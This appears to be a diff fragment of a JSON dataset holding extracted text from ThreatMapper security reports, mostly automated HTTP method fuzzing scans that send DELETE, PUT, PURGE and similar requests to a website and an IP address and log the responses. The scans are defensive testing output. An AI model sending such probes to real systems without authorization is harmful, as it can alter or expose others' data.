ZZZ \nPPID: 10, PID: 11 \nType: MatchedPolicy \nPolicyName: Policy #1 \nSource: /bin/dash, Resource: /bin/ls \nAction: Block \nResult: Permission Denied Summary Summary \nKubernetes \nMultiple VMs \n(KVM Service) \nSelf-managed VM Platform Handler \n(k8s, docker, containerd) \nKVM Agent KubeArmor \nCore Engine AppArmor \nEnforcer \nSELinux \nEnforcer \nSystem \nMonitor \nLogger \n(Feeder) gRPC Service \nkarmor CLI Alerts \nLogs BPF-LSM \nEnforcer \nKubeArmor " - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-14 19_09_17.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin Project 5/Security Test Suite 1/http://deepfence.show TestCase\nSummary\nStarted at 2021-04-14 19:09:17\nTime taken 00:00:09.476\nTotal scans performed: 62\nIssues found: 11\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 11 11\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest PURGE http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codesAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest COPY http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest UNLOCK http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest LOCK http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod LOCK\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest PROPFIND http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest PATCH http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest OPTIONS http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNINGEndpoint http://deepfence.show/\nRequest HEAD http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest DELETE http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest PUT http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest POST http://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #11" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2022-08-17 10_01_51.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin Project 2/Security Test Suite 1/https://137.184.10.129 TestCase\nSummary\nStarted at 2022-08-17 10:01:51\nTime taken 00:00:26.936\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PURGE https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest COPY https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest UNLOCK https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest LOCK https://137.184.10.129/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PROPFIND https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PATCH https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest TRACE https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest OPTIONS https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest HEAD https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest DELETE https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PUT https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest POST https://137.184.10.129/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2022-08-04 21_39_16.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin Project 2/Security Test Suite 1/https://137.184.10.129 TestCase\nSummary\nStarted at 2022-08-04 21:39:16\nTime taken 00:00:10.373\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PURGE https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest COPY https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest UNLOCK https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest LOCK https://137.184.10.129/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PROPFIND https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PATCH https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest TRACE https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest OPTIONS https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest HEAD https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest DELETE https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PUT https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest POST https://137.184.10.129/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" - } - ] - } -] +version https://git-lfs.github.com/spec/v1 +oid sha256:3e353a573c3b7ad04b17e8d0b08fd99ef4f827c45f69750dbc2eba281924b87d +size 10873136